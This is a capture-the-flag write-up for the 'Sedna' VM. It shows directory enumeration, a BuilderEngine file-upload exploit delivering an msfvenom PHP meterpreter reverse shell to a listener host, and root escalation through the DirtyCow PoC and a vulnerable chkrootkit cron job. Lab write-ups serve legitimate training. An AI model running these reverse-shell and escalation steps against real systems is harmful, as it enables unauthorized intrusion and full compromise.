+ http://192.168.1.28/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.1.28/system/
==> DIRECTORY: http://192.168.1.28/themes/
---- Entering directory: http://192.168.1.28/blocks/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/system/ ----
==> DIRECTORY: http://192.168.1.28/system/core/
==> DIRECTORY: http://192.168.1.28/system/database/
==> DIRECTORY: http://192.168.1.28/system/fonts/
==> DIRECTORY: http://192.168.1.28/system/helpers/
+ http://192.168.1.28/system/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://192.168.1.28/system/language/
==> DIRECTORY: http://192.168.1.28/system/libraries/
---- Entering directory: http://192.168.1.28/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.28/system/core/ ----
==> DIRECTORY: http://192.168.1.28/system/core/compat/
+ http://192.168.1.28/system/core/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/ ----
==> DIRECTORY: http://192.168.1.28/system/database/drivers/
+ http://192.168.1.28/system/database/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/fonts/ ----
+ http://192.168.1.28/system/fonts/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/helpers/ ----
+ http://192.168.1.28/system/helpers/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/language/ ----
==> DIRECTORY: http://192.168.1.28/system/language/english/
+ http://192.168.1.28/system/language/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/libraries/ ----
+ http://192.168.1.28/system/libraries/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/core/compat/ ----
+ http://192.168.1.28/system/core/compat/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/ ----
+ http://192.168.1.28/system/database/drivers/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://192.168.1.28/system/database/drivers/mssql/
==> DIRECTORY: http://192.168.1.28/system/database/drivers/mysql/
==> DIRECTORY: http://192.168.1.28/system/database/drivers/odbc/
---- Entering directory: http://192.168.1.28/system/language/english/ ----
+ http://192.168.1.28/system/language/english/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/mssql/ ----
+ http://192.168.1.28/system/database/drivers/mssql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/mysql/ ----
+ http://192.168.1.28/system/database/drivers/mysql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://192.168.1.28/system/database/drivers/odbc/ ----
+ http://192.168.1.28/system/database/drivers/odbc/index.html (CODE:200|SIZE:142)
-----------------
END_TIME: Wed May 17 15:35:17 2017
DOWNLOADED: 64568 - FOUND: 16
root@kali:~#

There are a plethora of interesting directories that dirb managed to find. Lets perm through the directories (blocks, files, modules, system, themes). This being a CTF we can safely assume that there might be an obsolete themes or plugins in use. Going through the directories we find :

http://192.168.1.28/themes/default_theme_2016/description.txt

Default Theme 2016 for BuilderEngine V3.

Doing a basic google search for “BuilderEngine exploit” gives us an exploit-db result which is an Arbitrary File Upload.

Lets modify the exploit to fit our needs. All we need to do is change local host to 192.168.1.28.

Lets generate a PHP Reverse Shell and upload it using the above exploit.

root@kali:~/Desktop/B2R# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes
root@kali:~/Desktop/B2R# file shell.php
shell.php: ASCII text, with very long lines, with no line terminators
root@kali:~/Desktop/B2R#

As stated in the exploit code lets try and access our shell at http://192.168.1.28/files/shell.php

But before we access out shell we need to setup the handle in msfconsole.

root@kali:~# msfconsole
,           ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.23-dev                         ]
+ -- --=[ 1578 exploits - 907 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id  Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...

Now access the shell

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 192.168.1.28
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.28:55176) at 2017-05-17 15:46:37 -0400
meterpreter > ls
Listing: /var/www/html/files
============================
Mode              Size   Type  Last modified              Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 32 fil 2016-10-24 13:45:38 -0400 .htaccess
40755/rwxr-xr-x 4096 dir 2016-10-24 13:45:38 -0400 .tmb
40755/rwxr-xr-x 4096 dir 2016-10-24 13:45:38 -0400 be_demo
100644/rw-r--r-- 66456 fil 2016-10-24 13:45:38 -0400 blogimage.jpg
40755/rwxr-xr-x 4096 dir 2016-10-24 13:45:38 -0400 captcha
100644/rw-r--r-- 37022 fil 2016-10-24 13:45:38 -0400 loading.gif
100644/rw-r--r-- 948 fil 2017-05-17 15:44:19 -0400 shell.php
40755/rwxr-xr-x 4096 dir 2016-10-24 13:45:38 -0400 users
meterpreter > shell
Process 6501 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cd /var/www
ls
flag.txt
html
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289 =====> Flag 1

Now our next step is to become root by escalating our privileges. So lets search for relevant exploits by enumerating the local machine.

meterpreter > shell
Process 5733 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/var/www/html/files$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@Sedna:/var/www/html/files$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

Privilege Escalation — Method 1

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) — ‘overlayfs’ Privilege Escalation is what caches our attention but unfortunately it fails to spawn a root shell.

www-data@Sedna:/tmp$ gcc 37292.c -o ofs
gcc 37292.c -o ofs
www-data@Sedna:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Sedna:/tmp$ ls
ls
37292.c hsperfdata_tomcat7 ofs tomcat7-tomcat7-tmp
www-data@Sedna:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
www-data@Sedna:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Sedna:/tmp$

Lets have a look at a more recent exploit Dirty Cow. By searching for exploits of Dirty Cow we find one on exploit-db. Running this exploit repeatedly crashed my Sedna machine. So looking further I found a list of DirtyCow POC. The one that seems to work was put together by @robinverton.

Running this exploit gave us root.

meterpreter > pwd
/var/www/html/files
meterpreter > cd /tmp
meterpreter > pwd
/tmp
meterpreter > upload /root/Desktop/B2R/cowroot.c .
[*] uploading : /root/Desktop/B2R/cowroot.c -> .
[*] uploaded : /root/Desktop/B2R/cowroot.c -> ./cowroot.c
meterpreter > shell
Process 7730 created.
Channel 3 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ gcc cowroot.c -o cowroot -pthread
gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:108:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
lseek(f,map,SEEK_SET);
^
In file included from cowroot.c:28:0:
/usr/include/unistd.h:334:16: note: expected '__off_t' but argument is of type 'void *'
extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
^
cowroot.c: In function 'main':
cowroot.c:151:5: warning: format '%d' expects argument of type 'int', but argument 2 has type '__off_t' [-Wformat=]
printf("Size of binary: %d\n", st.st_size);
^
www-data@Sedna:/tmp$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
root@Sedna:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

root@Sedna:/tmp# cd /root
cd /root
root@Sedna:/root# ls -la
ls -la
total 65776
drwx------ 5 root root 4096 Mar 12 00:54 .
drwxr-xr-x 21 root root 4096 Oct 7 2016 ..
-rw------- 1 root root 212 Mar 12 00:54 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Oct 22 2016 .cache
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 66 Oct 8 2016 .selected_editor
drwx------ 2 root root 4096 Oct 22 2016 .ssh
-rw-r--r-- 1 root root 67309882 Oct 24 2016 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
drwxr-xr-x 2 root root 4096 Oct 7 2016 chkrootkit
---------- 1 root root 33 Oct 22 2016 flag.txt
root@Sedna:/root# cat flag.txt
cat flag.txt
a10828bee17db751de4b936614558305 =====> Flag 2
root@Sedna:/root#

Privilege Escalation — Method 2

Check for scheduled activities/cron jobs.

www-data@Sedna:/etc$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
/etc/cron.daily:
total 96
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 625 Apr 3 2014 apache2
-rwxr-xr-x 1 root root 376 Apr 4 2014 apport
-rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
-rwxr-xr-x 1 root root 314 Feb 17 2014 aptitude
-rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
-rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
-rwxr-xr-x 1 root root 1029 Jun 5 2014 libvirt-bin
-rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
-rwxr-xr-x 1 root root 1261 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
-rwxr-xr-x 1 root root 249 Feb 16 2014 passwd
-rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
-rwxr-xr-x 1 root root 383 Jun 25 2014 samba
-rwxr-xr-x 1 root root 728 Feb 27 2014 tomcat7
-rwxr-xr-x 1 root root 214 Apr 9 2014 update-notifier-common
-rwxr-xr-x 1 root root 328 Jul 18 2014 upstart
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
/etc/cron.weekly:
total 36
drwxr-xr-x 2 root root 4096 Oct 7 2016 .
drwxr-xr-x 121 root root 12288 May 18 12:35 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 9 2014 update-notifier-common
www-data@Sedna:/etc$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@Sedna:/etc$ cd chkrootkit
cd chkrootkit
www-data@Sedna:/etc/chkrootkit$ ls
ls
ACKNOWLEDGMENTS README.chklastlog chklastlog.c chkutmp.c
COPYRIGHT README.chkwtmp chkproc.c chkwtmp.c
Makefile check_wtmpx.c chkrootkit ifpromisc.c
README chkdirs.c chkrootkit.lsm strings.c
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -h
./chkrootkit -h
Usage: ./chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-r dir use dir as the root directory
-p dir1:dir2:dirN path for the external commands used by chkrootkit
-n skip NFS mounted dirs
www-data@Sedna:/etc/chkrootkit$ ./chkrootkit -V
./chkrootkit -V
chkrootkit version 0.49
www-data@Sedna:/etc/chkrootkit$

So from the information we can infer that the cron job is executed every 17 minutes and also a vulnerable version of chkrootkit is also being run. Details of the exploit can be found here.

Upload update and suid.c to /tmp/ directory of the victim.

Do not forget to make the update executable.

meterpreter > pwd
/tmp
meterpreter > upload /root/Desktop/B2R/suid.c .
[*] uploading : /root/Desktop/B2R/suid.c -> .
[*] uploaded : /root/Desktop/B2R/suid.c -> ./suid.c
meterpreter > upload /root/Desktop/B2R/update .
[*] uploading : /root/Desktop/B2R/update -> .
[*] uploaded : /root/Desktop/B2R/update -> ./update
meterpreter > shell
Process 18632 created.
Channel 5 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$ ls
ls
hsperfdata_tomcat7 suid.c tomcat7-tomcat7-tmp update
www-data@Sedna:/tmp$ chmod +x update
chmod +x update
www-data@Sedna:/tmp$ gcc suid.c -o suid
gcc suid.c -o suid
www-data@Sedna:/tmp$ ls -la
ls -la
total 32
drwxrwxrwt 4 root root 4096 May 18 21:04 .
drwxr-xr-x 21 root root 4096 Oct 7 2016 ..
drwxr-xr-x 2 tomcat7 tomcat7 4096 May 18 12:35 hsperfdata_tomcat7
-rwxr-xr-x 1 www-data www-data 7342 May 18 21:04 suid
-rw-r--r-- 1 www-data www-data 73 May 18 21:04 suid.c
drwxr-xr-x 2 tomcat7 root 4096 May 18 12:35 tomcat7-tomcat7-tmp
-rwxr-xr-x 1 www-data www-data 78 May 18 21:04 update
www-data@Sedna:/tmp$ ls -la suid
ls -la suid
-rwsr-xr-x 1 root root 7342 May 18 21:04 suid

www-data@Sedna:/tmp$ ./suid
./suid
root@Sedna:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@Sedna:/tmp# cat /root/flag.txt
cat /root/flag.txt
a10828bee17db751de4b936614558305
root@Sedna:/tmp#

Searching for the third flag

root@Sedna:/tmp# cd /etc/tomcat7
cd /etc/tomcat7
root@Sedna:/etc/tomcat7# ls
ls
Catalina context.xml policy.d tomcat-users.xml
catalina.properties logging.properties server.xml web.xml
root@Sedna:/etc/tomcat7# tail tomcat-users.xml
tail tomcat-users.xml
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
-->
<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>
root@Sedna:/etc/tomcat7#

The privilege escalation aspects was tough as variants of the Dirty Cow exploit just crashed the machine. But in the end we were finally able to escalate our privileges.

Happy Hacking !!!

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.